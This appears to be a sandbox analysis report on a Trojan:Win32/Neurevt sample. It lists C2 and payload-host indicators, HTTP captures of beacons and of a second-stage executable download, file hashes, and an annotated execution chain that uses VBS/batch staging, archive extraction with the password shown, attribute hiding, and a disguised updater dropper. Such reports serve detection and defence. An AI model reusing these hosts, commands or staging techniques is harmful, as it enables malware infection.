SHA256:
86aab09b278fe8e538d8cecd28f2d7a32fe413724d5ee52e2815a3267a988595
Date Analysed:
2021-06-25T01:26:51+05:30
File type:
EXE
Verdict:
Malware
Strain:
Trojan:Win32/Neurevt
Environment:
Windows 7 64-bit Operating System
IOC
Domain
russk18.icu (C2 — receives the POST check-ins below; resolved to 23.95.225.105 in this run)
be-xoo.com (second-stage payload host — serves getdata2.exe; resolved to 144.202.1.97 in this run)
URL
http://russk18.icu/forum8/logout.php
http://russk18.icu/forum8/logout.php?page=XXX
http://russk18.icu/forum8/logout.php?id=XXX
http://be-xoo.com/getdata2.exe
(XXX stands for a variable numeric value — this run used page=116, id=7084448 and id=3192189 — so match on the host and path /forum8/logout.php rather than on the full query string. The IP addresses are taken from a single sandbox run and may rotate; treat the domains as the durable indicators.)
Network
HTTP Conversations
(Notes: the Date, Last-Modified and ETag header values below are cut off at the first ':' by the capture and cannot be reconstructed; the listing order is not chronological — compare the Date hours (19 vs 20). All traffic is plain HTTP, so the POST bodies (674, 4820, 1049 and 657 bytes) are inspectable on the wire. The User-Agent matches the sandbox host's own IE8/Windows 7 x64 string and the responses land in the WinINet cache as Content.IE5\...\logout[1].php, so it is presumably the system default rather than a hard-coded value — do not rely on it as an indicator. The C2 answers every POST with HTTP 200 text/html from nginx/1.20.1 + PHP/5.6.40; the payload host is IIS 10 behind Plesk.)
[POST]http://russk18.icu/forum8/logout.php
Request Header
POST /forum8/logout.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: russk18.icu
Content-Length: 674
Cache-Control: no-cache
Response body filetype
text/html; charset=UTF-8
Response Header
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 24 Jun 2021 20
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.40
[POST]http://russk18.icu/forum8/logout.php?id=7084448
Request Header
POST /forum8/logout.php?id=7084448 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: russk18.icu
Content-Length: 4820
Cache-Control: no-cache
Response body filetype
text/html; charset=UTF-8
Response Header
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 24 Jun 2021 19
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.40
[POST]http://russk18.icu/forum8/logout.php?page=116
Request Header
POST /forum8/logout.php?page=116 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: russk18.icu
Content-Length: 1049
Cache-Control: no-cache
Response body filetype
text/html; charset=UTF-8
Response Header
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 24 Jun 2021 20
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.40
[GET]http://be-xoo.com/getdata2.exe
Request Header
GET /getdata2.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: be-xoo.com
Cache-Control: no-cache
Response body filetype
application/octet-stream
Response Header
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Thu, 24 Jun 2021 15
Accept-Ranges: bytes
ETag: "f98a8620b69d71
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Date: Thu, 24 Jun 2021 19
Content-Length: 3146752
[POST]http://russk18.icu/forum8/logout.php?id=3192189
Request Header
POST /forum8/logout.php?id=3192189 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: russk18.icu
Content-Length: 657
Cache-Control: no-cache
Response body filetype
text/html; charset=UTF-8
Response Header
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 24 Jun 2021 20
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.40
DNS Resolutions
(windowsupdate.microsoft.com is a Microsoft-owned name and no HTTP conversation to it is recorded; it is most likely a connectivity check and should not be listed as an IOC.)
be-xoo.com
["144.202.1.97"]
windowsupdate.microsoft.com
["52.137.90.34"]
russk18.icu
["23.95.225.105"]
Files Dropped
(Listed by SHA256 and MIME type only; the sandbox does not record the on-disk names. The single application/octet-stream entry presumably corresponds to the 3146752-byte getdata2.exe download from be-xoo.com, and the text/html entries to the cached C2 responses (logout[1].php) — confirm by size/hash before using them as file indicators.)
c6a95ca7d803180979387ed82791c0d0afb148e1670c6c52a3fc29d6751cdac6
text/html; charset=UTF-8
8eca4cb567bc25fc6c08c81f50c00815d5501ca88361437d9873b9c4a6185bae
text/html; charset=UTF-8
361a9b2bc7a1badb20b9e53da78455e67ed0194caca7bcb1af5ac6c9822bbf9e
text/html; charset=UTF-8
07da4b8814b385a9228e474797c37d50cee0a73c0aa07f74a09fa3b21b581669
application/octet-stream
0bf7c94f526528b97dc3acbae9fd0097b7167a8760717cc549214ae4b7adf3aa
text/html; charset=UTF-8
66c2cb1ff42b7f0a0ca968d78be292faf24166c84bc8c6f8967782d528715d9a
text/html; charset=UTF-8
Process
Files Accessed
C:\LMPupdate\set\unpakedree.exe
C:\Users\ADMINI~1\AppData\Local\Temp\AITMP515\aidatafile.zip
C:\LMPupdate\set\183.bat
C:\LMPupdate\set\x0329847998
C:\Windows\SysWOW64\profapi.dll
C:\LMPupdate\set\435246.vbs
C:\Windows
C:\Windows\SysWOW64
C:\Windows\AppPatch\sysmain.sdb
C:\Windows\SysWOW64\apphelp.dll
C:\Windows\SysWOW64\wscript.exe
C:\LMPupdate\set
C:\LMPupdate
C:\Windows\SysWOW64\advapi32.dll
C:\Windows\SysWOW64\vbscript.dll
C:\Windows\Registration\R000000000006.clb
C:\Windows\SysWOW64\dwmapi.dll
C:\Windows\SysWOW64\sxs.dll
C:\Windows\Globalization\Sorting\SortDefault.nls
C:\Windows\SysWOW64\uxtheme.dll
C:\Windows\SysWOW64\imm32.dll
C:\Windows\SysWOW64\version.dll
C:\Windows\SysWOW64\sechost.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll
C:\Windows\System32\wow64.dll
C:\Windows\SysWOW64\scrobj.dll
C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
C:\Windows\SysWOW64\wshext.dll
C:\Windows\SysWOW64\msisip.dll
C:\Windows\SysWOW64\rsaenh.dll
C:\Windows\SysWOW64\cryptsp.dll
C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
C:\Windows\SysWOW64\shell32.dll
C:\Windows\SysWOW64\propsys.dll
C:\Windows\SysWOW64\wshom.ocx
C:\Windows\SysWOW64\scrrun.dll
C:\Windows\SysWOW64\mpr.dll
C:\Windows\SysWOW64\urlmon.dll
C:\Users\Administrator\Desktop\desktop.ini
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Windows\SysWOW64\ntmarta.dll
C:\Windows\WindowsShell.Manifest
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\winbrand.dll
C:\
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_4261962
C:\Windows\SysWOW64\timeout.exe
C:\Windows\SysWOW64\en-US\timeout.exe.mui
C:\Users\Administrator\AppData\Roaming\npm
C:\Users\Administrator\AppData\Local\Programs\Python\Python37
C:\Users\Administrator\AppData\Local\Programs\Python\Python37\Scripts
C:\Program Files\nodejs
C:\Windows\SysWOW64\WindowsPowerShell\v1.0
C:\Windows\SysWOW64\wbem
C:\Windows\SysWOW64\PING.EXE
C:\Windows\SysWOW64\rasadhlp.dll
C:\Windows\SysWOW64\dnsapi.dll
C:\Windows\SysWOW64\wship6.dll
C:\Windows\SysWOW64\WSHTCPIP.DLL
C:\Windows\SysWOW64\mswsock.dll
C:\Windows\SysWOW64\en-US\ping.exe.mui
C:\Windows\SysWOW64\winnsi.dll
C:\Users\ADMINI~1\AppData\Local\Temp\AITMP515\AUninstall.ini
C:\Windows\SysWOW64\api-ms-win-core-synch-l1-2-0.dll
C:\Windows\SysWOW64\crypt32.dll
C:\Users\Administrator\AppData
C:\Users\Administrator
C:\Users
C:\Users\desktop.ini
C:\LMPupdate\set\43939237cx.rar
C:\LMPupdate\set\48551.bat
C:\LMPupdate\set\xc829374091FD.exe
C:\LMPupdate\set\3980392CV.vbs
C:\Windows\System32\imm32.dll
C:\Windows\System32\winbrand.dll
C:\Windows\System32\apphelp.dll
C:\Windows\winsxs\FileMaps\$$_system32_21f9a9c4a2f8b514.cdf-ms
C:\Windows\SysWOW64\sfc_os.dll
C:\Windows\SysWOW64\sfc.dll
C:\Windows\SysWOW64\attrib.exe
C:\Windows\SysWOW64\ulib.dll
C:\Windows\SysWOW64\en-US\attrib.exe.mui
C:\Windows\SysWOW64\srvcli.dll
C:\Windows\SysWOW64\netutils.dll
C:\Windows\SysWOW64\taskkill.exe
C:\Windows\SysWOW64\netapi32.dll
C:\Windows\SysWOW64\secur32.dll
C:\Windows\SysWOW64\tapi3.dll
C:\Windows\SysWOW64\wkscli.dll
C:\Windows\SysWOW64\en-US\taskkill.exe.mui
C:\Windows\SysWOW64\dbghelp.dll
C:\Windows\SysWOW64\wtsapi32.dll
C:\Windows\SysWOW64\framedynos.dll
C:\Windows\SysWOW64\samcli.dll
C:\Windows\SysWOW64\ntdsapi.dll
C:\Windows\SysWOW64\wbem\fastprox.dll
C:\Windows\SysWOW64\wbem\wbemsvc.dll
C:\Windows\SysWOW64\RpcRtRemote.dll
C:\Windows\SysWOW64\winsta.dll
C:\Windows\SysWOW64\explorer.exe
C:\Windows\winsxs
C:\Windows\SysWOW64\ntdll.dll
C:\Windows\SysWOW64\wbemcomn.dll
C:\Windows\SysWOW64\wbem\wbemprox.dll
C:\Windows\SysWOW64\en-US\KernelBase.dll.mui
C:\Windows\SysWOW64\samlib.dll
C:\ProgramData
C:\ProgramData\Google Updater 2.09\3a1m9iqmu7mwag.exe
C:\ProgramData\Google Updater 2.09
C:\ProgramData\Google Updater 2.09\gayyokaek.txt
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Windows\SysWOW64\slc.dll
C:\Windows\SysWOW64\powrprof.dll
C:\Windows\SysWOW64\dui70.dll
C:\Windows\SysWOW64\duser.dll
C:\Windows\SysWOW64\ExplorerFrame.dll
C:\Windows\Fonts\StaticCache.dat
C:\Windows\SysWOW64\wininet.dll
C:\Windows\SysWOW64\winrnr.dll
C:\Windows\SysWOW64\pnrpnsp.dll
C:\Windows\SysWOW64\NapiNSP.dll
C:\Windows\SysWOW64\nlaapi.dll
C:\Windows\SysWOW64\FWPUCLNT.DLL
C:\Windows\SysWOW64\IPHLPAPI.DLL
C:\Users\Administrator\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
C:\Users\Administrator\AppData\Local\Microsoft\Windows\History\History.IE5
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
C:\Users\Administrator\AppData\LocalLow\Sun\Java\Deployment\deployment.properties
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0NQY21LG\logout[1].php
C:\Windows\SysWOW64\SensApi.dll
C:\Windows\SysWOW64\ras
C:\Windows\SysWOW64\rtutils.dll
C:\Windows\SysWOW64\rasman.dll
C:\Windows\SysWOW64\rasapi32.dll
C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1118702447-2625566189-3437391212-500\a18ca4003deb042bbee7a40f15e1970b_d29292bc-6ac1-4095-a280-5613a9b5e8f4
C:\Windows\SysWOW64\userenv.dll
C:\Windows\SysWOW64\tzres.dll
C:\Users\ADMINI~1\AppData
C:\Users\ADMINI~1
C:\Users\ADMINI~1\AppData\Local\Temp
C:\Users\ADMINI~1\AppData\Local\Temp\3a1m9iqmu7mwag_1.exe
C:\Users\ADMINI~1\AppData\Local\Temp\3a1m9iqmu7mwag_1.exe:14EDFC78
C:\Users\ADMINI~1\AppData\Local
C:\Windows\SysWOW64\npmproxy.dll
C:\Windows\SysWOW64\netprofm.dll
C:\Windows\AppPatch\AppPatch64\sysmain.sdb
C:\Users\ADMINI~1\AppData\Local\Temp\k77saes3u.exe
C:\Windows\Microsoft.NET\Framework64
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319
C:\Windows\System32\sechost.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config
C:\Windows\System32\msvcr110_clr0400.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\9da5bb33cd1c34b7851c088f0cf749cc\mscorlib.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\9da5bb33cd1c34b7851c088f0cf749cc\mscorlib.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\713a8c0e41e664d349efcc0cec7f5e86\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\713a8c0e41e664d349efcc0cec7f5e86\System.Core.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core
C:\Windows\assembly\NativeImages_v4.0.30319_64\System\e3305bdbd03ef919051aa7f2783ac32a\System.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\System\e3305bdbd03ef919051aa7f2783ac32a\System.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_64\System
C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\d18710ed5e7f97e18f73837505dbb041\Microsoft.VisualBasic.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#
C:\Windows\System32\uxtheme.dll
C:\Windows\System32\cryptbase.dll
C:\Windows\System32\rpcss.dll
C:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\comctl32.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\57d58592aa974e9d0ccd4546e981c295\System.Windows.Forms.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\acc5b07beef536f26da664ecfc145083\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\acc5b07beef536f26da664ecfc145083\System.Drawing.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\57d58592aa974e9d0ccd4546e981c295\System.Windows.Forms.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\d18710ed5e7f97e18f73837505dbb041\Microsoft.VisualBasic.ni.dll
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runt73a1fc9d#\96cbfd6eef291b11a5d04028360f6081\System.Runtime.Remoting.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runt73a1fc9d#\96cbfd6eef291b11a5d04028360f6081\System.Runtime.Remoting.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runt73a1fc9d#
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\sortdefault.nlp
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\nlssorting.dll
C:\Windows\winsxs\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\GdiPlus.dll
C:\Windows\System32\tzres.dll
C:\Windows\Fonts\msjh.ttf
C:\Windows\Fonts\tahoma.ttf
C:\Users\Administrator\AppData\Local\GDIPFONTCACHEV1.DAT
C:\Windows\Fonts\segoeui.ttf
C:\Windows\Fonts\micross.ttf
C:\Windows\Fonts\malgun.ttf
C:\Windows\Fonts\msyh.ttf
C:\Windows\Fonts\verdana.ttf
C:\Windows\Fonts\segoeuiz.ttf
C:\Windows\Fonts\segoeuii.ttf
C:\Windows\Fonts\segoeuib.ttf
C:\Windows\Fonts\verdanaz.ttf
C:\Windows\Fonts\verdanai.ttf
C:\Windows\Fonts\verdanab.ttf
C:\Windows\System32\WindowsCodecs.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
C:\Windows\System32\RpcRtRemote.dll
C:\Windows\System32\rsaenh.dll
C:\Windows\System32\cryptsp.dll
C:\Windows\Fonts\arialbd.ttf
C:\Windows\Fonts\arialbi.ttf
C:\Windows\Fonts\ariali.ttf
C:\Windows\Fonts\arial.ttf
C:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll
C:\Windows\System32\en-US\msctf.dll.mui
C:\Windows\System32\dwmapi.dll
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VBB46FVT\logout[1].php
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZQNBZ6B0\logout[1].php
C:\Windows\SysWOW64\ole32.dll
C:\Windows\SysWOW64\en-US\msctf.dll.mui
C:\Windows\System32\powrprof.dll
C:\Windows\System32\KBDUS.DLL
C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc
C:\Windows\System32\msidle.dll
C:\Windows\System32\credssp.dll
C:\Windows\System32\sspicli.dll
C:\Windows\System32\secur32.dll
C:\Windows\System32\profapi.dll
C:\Windows\System32\esent.dll
C:\Windows\System32\mssrch.dll
C:\Windows\System32\tquery.dll
C:\Windows\System32\en-US\tquery.dll.mui
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.3.gthr
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.3.Crwl
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex
C:\Windows\System32\propsys.dll
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.002
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.000
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap
C:\Windows\System32\mssprxy.dll
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs
C:\ProgramData\Microsoft\Search\Data\Applications\Windows
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\MSS.chk
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\MSS.log
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.000
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010006.dir
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010006.wid
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010005.dir
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010005.wid
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010004.dir
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010004.wid
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010003.dir
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010003.wid
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010002.dir
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010002.wid
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010001.dir
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010001.wid
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.001
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.000
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\SETTINGS.DIA
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.002
C:\Windows\System32\samcli.dll
C:\Windows\System32\vsstrace.dll
C:\Windows\System32\atl.dll
C:\Windows\System32\vssapi.dll
C:\Windows\System32\ntmarta.dll
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0002.002
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0002.000
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010009.dir
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010009.wid
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010007.dir
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010007.wid
C:\Windows\System32\es.dll
C:\Windows\System32\netutils.dll
C:\Windows\System32\samlib.dll
C:\Windows\System32
C:\Windows\System32\LogFiles
C:\Windows\System32\LogFiles\WMI
C:\ProgramData\Microsoft\Search\Data
C:\ProgramData\Microsoft
C:\ProgramData\Microsoft\Search
C:\ProgramData\Microsoft\Search\Data\Applications
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files
C:\ProgramData\VMware
C:\Program Files
C:\Windows\System32\wdi
C:\Windows\System32\Msdtc
C:\Windows\ServiceProfiles
C:\ProgramData\VMware\Compatibility
C:\Windows\ServiceProfiles\LocalService
C:\Windows\ServiceProfiles\LocalService\AppData
C:\Windows\ServiceProfiles\LocalService\AppData\Local
C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp
C:\Users\Administrator\AppData\Local\Microsoft\Windows
C:\Users\Administrator\AppData\Local\Microsoft\Windows\History
C:\Users\Administrator\AppData\Roaming
C:\Users\Administrator\AppData\Roaming\Microsoft
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows
C:\Users\Administrator\AppData\Local
C:\Users\Administrator\AppData\Local\Microsoft
C:\Windows\AppCompat
C:\Windows\System32\wbem
C:\Windows\System32\catroot2
C:\Windows\ServiceProfiles\NetworkService
C:\Windows\ServiceProfiles\NetworkService\AppData
C:\Windows\ServiceProfiles\NetworkService\AppData\Local
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows Media Player NSS
C:\ProgramData\Microsoft\Windows
C:\Windows\System32\userenv.dll
C:\Windows\System32\winsta.dll
C:\Windows\System32\wtsapi32.dll
C:\Windows\System32\stdole2.tlb
C:\Windows\System32\mssitlb.dll
C:\Windows\System32\sxs.dll
C:\Windows\System32\SearchFilterHost.exe
C:\Windows\System32\SearchProtocolHost.exe
C:\Windows\System32\mapi32.dll
C:\Windows\System32\mssvp.dll
C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini
C:\Windows\System32\shell32.dll
C:\Windows\System32\NlsLexicons0009.dll
C:\Windows\System32\NlsData0009.dll
C:\Windows\System32\NaturalLanguage6.dll
C:\Windows\System32\cscobj.dll
C:\Windows\System32\cscapi.dll
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010008.ci
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010008.wid
C:\Users\Public\Desktop\desktop.ini
C:\Users\Public
C:\Users\Public\Documents\desktop.ini
C:\Users\Public\desktop.ini
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010007.wsb
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.002
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010008.dir
C:\Users\Administrator\AppData\LocalLow
C:\Users\Administrator\AppData\LocalLow\Sun
C:\Users\Administrator\AppData\LocalLow\Sun\Java
C:\Windows\Microsoft.NET
C:\Windows\Microsoft.NET\Framework
C:\Users\Administrator\AppData\Local\Microsoft\Windows\WER
C:\ProgramData\Microsoft\RAC
C:\Malware
C:\Windows\SysWOW64\winspool.drv
C:\Users\ADMINI~1\AppData\Local\Temp\AITMP515\aisetup.ini
C:\Users\ADMINI~1\AppData\Local\Temp\AITMP515\Englishai.lng
C:\Users\ADMINI~1\AppData\Local\Temp\AITMP515\aisetup.zip
C:\Malware\86aab09b278fe8e538d8cecd28f2d7a32fe413724d5ee52e2815a3267a988595.exe
C:\Windows\winsxs\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9\comctl32.dll.mui
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
C:\Users\ADMINI~1\AppData\Local\Temp\AITMP515
C:\Windows\Fonts\tahomabd.ttf
C:\Windows\win.ini
C:\Windows\SysWOW64\riched20.dll
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu
Process Created
(Execution chain as recorded: the sample stages files under C:\LMPupdate\set and launches 435246.vbs via WScript, which runs 183.bat through cmd. The batch file calls unpakedree.exe with `e -p67dah9fasdd8kja8ds9h9sad 43939237cx.rar` — the syntax of a command-line archive extractor, so the binary is presumably a renamed RAR/7-Zip-style tool and the password can be used to extract the archive from the staging directory for analysis. The archive yields xc829374091FD.exe, 48551.bat and 3980392CV.vbs; the second batch hides the staging directory with `attrib +s +h`, un-hides and starts `xc829374091FD.exe /start`, and cleans up with `taskkill /f /im unpakedree.exe`. The `timeout N` calls and `ping dhgfg sgudy` (pinging two non-existent names) look like simple delays. xc829374091FD.exe then spawns C:\Windows\SysWOW64\explorer.exe, drops C:\ProgramData\Google Updater 2.09\3a1m9iqmu7mwag.exe (a Google Updater look-alike name), runs a copy from %TEMP% as `3a1m9iqmu7mwag_1.exe /suac` — note the alternate data stream 3a1m9iqmu7mwag_1.exe:14EDFC78 in the file list — and launches k77saes3u.exe from %TEMP%. The AITMP515\aisetup.* and AUninstall.ini artifacts suggest the initial EXE is a third-party installer package wrapping the dropper; verify against the sample.)
"C:/Malware/86aab09b278fe8e538d8cecd28f2d7a32fe413724d5ee52e2815a3267a988595.exe"
"C:\Windows\System32\WScript.exe" "C:\LMPupdate\set\435246.vbs"
ping dhgfg sgudy
